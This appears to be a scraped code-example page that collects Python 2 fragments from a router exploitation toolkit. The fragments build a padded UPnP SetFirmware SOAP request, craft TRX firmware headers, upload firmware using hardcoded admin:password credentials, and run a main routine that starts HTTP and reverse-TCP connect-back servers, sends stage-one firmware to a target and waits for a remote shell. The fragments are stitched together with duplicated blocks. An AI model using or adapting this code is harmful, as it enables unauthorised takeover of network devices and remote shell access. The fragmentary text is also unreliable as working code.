Example #1
0
    def __init__(self, logger=None):
        if not logger:
            logger = Logging(max_level=Logging.DEBUG)

        self.request_body = "A" * self.MIN_CONTENT_LENGTH

        length = len(self.request_body)
        logger.LOG_DEBUG("Length of request body is: %d" % length)

        self.request_headers = SetFirmwareRequestHeaders(length)
Example #2
0
 def __init__(self,firmware_data,b64encode=True,logger=None):
     if not logger:
         logger=Logging(max_level=Logging.DEBUG)
     self.logger=logger
     logger.LOG_DEBUG("Building SetFirmware request body.")
     logger.LOG_DEBUG("Length of firmware: %d" % len(firmware_data))
     if b64encode:
         self.encoded_firmware=base64.b64encode(firmware_data)
     else:
         self.encoded_firmware=firmware_data
     
     logger.LOG_DEBUG("Length of encoded firmware: %d" % len(self.encoded_firmware))
Example #3
0
 def __init__(self,firmware_file=None,logger=None):
     b64encode=True
     if not logger:
         logger=Logging(max_level=Logging.DEBUG)
     if firmware_file:
         logger.LOG_INFO("Reading firmware data from: %s" % firmware_file)
         firmware_data=open(firmware_file,"rb").read()
     else:
         b64encode=False
         logger.LOG_INFO("Generating padding of As in place of firmware data.")
         firmware_data="A"*self.MIN_CONTENT_LENGTH
     
     self.request_body=SetFirmwareBody(firmware_data,b64encode=b64encode,logger=logger)
     self.request_headers=SetFirmwareRequestHeaders(self.MIN_CONTENT_LENGTH)
Example #4
0
 def __init__(self,firmware_data,min_content_length=102401,logger=None):
     if not logger:
         logger=Logging(max_level=Logging.DEBUG)
     self.request_body=SetFirmwareRequestBody(firmware_data,min_content_length,logger=logger)
     length=len(self.request_body)
     # logger.LOG_DEBUG("Length of request body is: %d" % length)
     self.request_headers=SetFirmwareRequestHeaders(length)
Example #5
0
    def __init__(self,firmware_data,min_content_length,logger=None):
        if not logger:
            logger=Logging(max_level=Logging.DEBUG)
        self.logger=logger
        logger.LOG_DEBUG("Building SetFirmware request body.")
        logger.LOG_DEBUG("Length of firmware: %d" % len(firmware_data))
        self.encoded_firmware=base64.b64encode(firmware_data)

        self.request_start="<SOAP-ENV:Body><NewFirmware>"
        self.request_end="</NewFirmware></SOAP-ENV:Body>"
        length=len(self.request_start)+len(self.request_end)+len(self.encoded_firmware)

        padding=""
        if length < min_content_length:
            print "Current length is %d" % length
            print "Generating %d As" %(min_content_length - length)
            padding="A"*(min_content_length - length)+"FOO"
        self.padding=padding
 def __init__(self,host,port,fw_stage1,logger=None):
     if not logger:
         logger=Logging(max_level=Logging.DEBUG)
     min_content_length=102401
     self.logger=logger
     self.host=host
     self.port=port
     
     request=SetFirmwareRequest(firmware_file=fw_stage1,logger=logger)
     self.request=request
Example #7
0
 def __init__(self,host,port,fw_stage1,logger=None):
     if not logger:
         logger=Logging(max_level=Logging.DEBUG)
     min_content_length=102401
     self.logger=logger
     self.host=host
     self.port=port
     firmware_data=open(fw_stage1,'rb').read()
     
     request=SetFirmwareRequest(str(firmware_data),min_content_length,logger=logger)
     self.request=request
Example #8
0
    def __init__(self, input_files, endianness, logger=None):
        if not logger:
            logger = Logging(max_level=Logging.DEBUG)

        trx_header = TrxHeader(input_files, endianness, logger=logger)

        firmware_data = str(trx_header)

        for file in input_files:
            firmware_data += open(file, "rb").read()

        self.firmware_data = firmware_data
Example #9
0
def main(firmware_file=None):
    logger = Logging(max_level=Logging.DEBUG)
    request = SetFirmwareRequest(firmware_file=firmware_file, logger=logger)

    #write out the request to a file so we can easily analyze what we sent.
    logger.LOG_DEBUG("Writing request to request.bin for analysis.")
    open("./request.bin", "wb").write(str(request))
    logger.LOG_DEBUG("Done.")

    logger.LOG_INFO("Sending special UPnP request to host: %s" % HOST)
    special_upnp_send(HOST, 5000, str(request))
    logger.LOG_INFO("Done.")
Example #10
0
def send_fw(url,fw_file):
    
    logger=Logging(max_level=Logging.DEBUG)
    logger.LOG_INFO("Sending %s" % fw_file)
    logger.LOG_INFO("to %s" % url)

    fw_file_basename=os.path.basename(fw_file)
    
    logger.LOG_INFO("Creating headers.")
    headers={"Accept":
    "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"}
    headers["Accept-Language"]="en-US,en;q=0.5"
    headers["Accept-Encoding"]="gzip, deflate"
    headers["Referer"]="http://192.168.127.141/UPG_upgrade.htm"

    #admin:password
    headers["Authorization"]="Basic YWRtaW46cGFzc3dvcmQ="
    headers["Connection"]="keep-alive"

    logger.LOG_INFO("Creating post data")
    
    mf=MultipartForm()
    mf.add_field("buttonHit","Upgrade")
    mf.add_field("buttonValue","Upload")
    mf.add_field("IS_check_upgrade","0")
    mf.add_field("ver_check_enable","1")
    mf.add_file("mtenFWUpload",fw_file)
    mf.add_field("upfile",fw_file_basename)
    mf.add_field("Upgrade","Upload")
    mf.add_field("progress","")
    post_data=str(mf)
    headers["Content-Length"]=("%s" % len(post_data))
    headers["Content-Type"]=mf.get_content_type()
    client=HttpClient()
    logger.LOG_INFO("Sending request.")
    resp=client.send(url,headers=headers,post_data=post_data)
    
    return resp
Example #11
0
def main(stage1,stage2,docroot):
    logger=Logging(max_level=Logging.DEBUG)
    
    """
    Start servers
    """
    try:
        logger.LOG_INFO("Starting HTTP connect-back server.")
        httpd,http_pid=do_http_connectback([stage2],HTTP_PORT,docroot,logger)
        logger.LOG_INFO("HTTP server started.")
    except Exception as e:
        print e
        sys.exit(1)

    try:
        logger.LOG_INFO("Starting reverse-tcp server.")
        connect_back,cb_pid=do_tcp_connectback(CONNECTBACK_PORT,logger)
        logger.LOG_INFO("Reverse-tcp server started.")
    except Exception as e:
        print e
        httpd.shutdown()
        sys.exit(1)
    
    """
    Exploit UPnP
    """
    try:
        logger.LOG_DEBUG("Instantiating UPnP firmware exploit.")
        exploit=UPNPFirmwareExploit(TARGET,UPNP_PORT,stage1,logger=logger)
        logger.LOG_INFO("Sending stage 1 firmware.")
        exploit.send()
        logger.LOG_INFO("Done with stage 1 firmware.")
    except Exception as e:
        print e
        traceback.print_exc()
        httpd.shutdown()
        connect_back.shutdown()
        raise e
        sys.exit(1)
    
    
    """
    Wait for servers to finish.
    """
    logger.LOG_INFO("Serving stage 2 firmware.")
    try:
        logger.LOG_INFO("Waiting for server to terminate. PID: %d" % http_pid)
        httpd.wait()
    except Exception as e:
        logger.LOG_WARN("Error with HTTP server: %s" % str(e))
        connect_back.shutdown()
        httpd.shutdown()
        #not sure if this is fatal or not.
        #We probably killed with ctrl+c
        sys.exit(1)
    
    logger.LOG_INFO("HTTP server terminated.")
    logger.LOG_INFO("Done serving with stage 2 firmware.")
    
    logger.LOG_INFO("Waiting for incoming remote shell.")
    try:
        logger.LOG_INFO("Waiting for reverse-tcp server to terminate.")
        connect_back.wait()
    except Exception as e:
        #pretty sure this happens when we ctrl+c during a reverse-tcp shell.
        logger.LOG_INFO("Shutting down reverse-tcp server.")
        connect_back.shutdown()
        httpd.shutdown()
    
    logger.LOG_INFO("Exploitation of %s complete." % TARGET)
    
    httpd.shutdown()
    connect_back.shutdown()
    sys.exit(0)
    logger.LOG_INFO("Done serving with stage 2 firmware.")
    
    logger.LOG_INFO("Waiting for incoming remote shell.")
    try:
        logger.LOG_INFO("Waiting for reverse-tcp server to terminate.")
        connect_back.wait()
    except Exception as e:
        #pretty sure this happens when we ctrl+c during a reverse-tcp shell.
        logger.LOG_INFO("Shutting down reverse-tcp server.")
        connect_back.shutdown()
        httpd.shutdown()
    
    logger.LOG_INFO("Exploitation of %s complete." % TARGET)
    
    httpd.shutdown()
    connect_back.shutdown()
    sys.exit(0)
    
    
    
    
if __name__ == "__main__":
    docroot=SRVROOT
    stage1=docroot+"/"+STAGE1
    try:
        main(stage1,STAGE2,docroot)
    except Exception as e:
        Logging().LOG_WARN("Exploit failed: %s" % str(e))

    
Example #13
0
    def __init__(self, input_files, endianness, logger=None):

        if not logger:
            logger = Logging(max_level=Logging.DEBUG)

        cls = self.__class__
        self.endianness = endianness

        if len(input_files) < 1 or len(input_files) > 3:
            raise TrxHeaderException(
                "Must have at least one input file and not more than 3.")

        partitions = []
        total_size = cls.TRX_HEADER_SIZE
        offsets = [0, 0, 0]
        i = 0
        for file in input_files:
            data = open(file, "rb").read()
            offsets[i] = total_size
            total_size += len(data)
            partitions.append(data)
            i += 1

        sc = SectionCreator(self.endianness)

        sc.string_section(cls.TRX_MAGIC_OFFSET,
                          cls.TRX_MAGIC,
                          description="TRX magic bytes.")

        sc.gadget_section(cls.TRX_SIZE_OFFSET,
                          total_size,
                          description="Total size of trx+data.")

        version_flags = self._make_version_flags(cls.TRX_FLAGS,
                                                 cls.TRX_VERSION)
        sc.string_section(cls.TRX_FLAGS_OFFSET,
                          version_flags,
                          description="TRX flags & version.")

        partition_offset = offsets[0]
        sc.gadget_section(cls.TRX_PART_1_OFFSET,
                          partition_offset,
                          description="Offset of partition 1.")

        partition_offset = offsets[1]
        sc.gadget_section(cls.TRX_PART_2_OFFSET,
                          partition_offset,
                          description="Offset of partition 2.")

        partition_offset = offsets[2]
        sc.gadget_section(cls.TRX_PART_3_OFFSET,
                          partition_offset,
                          description="Offset of partition 3.")

        pre_checksum_header = OverflowBuffer(self.endianness,
                                             cls.TRX_HEADER_SIZE,
                                             sc.section_list)

        data = str(pre_checksum_header)
        data = data[cls.TRX_FLAGS_OFFSET:]
        data += "".join(partitions)

        crc = CRC32(data).crc

        logger.LOG_DEBUG("TRX crc32: 0x%08x" % crc)

        sc.gadget_section(cls.TRX_CRC32_OFFSET,
                          crc,
                          description="crc32 of header+data.")

        trx_header = OverflowBuffer(self.endianness, cls.TRX_HEADER_SIZE,
                                    sc.section_list)

        self.trx_header = str(trx_header)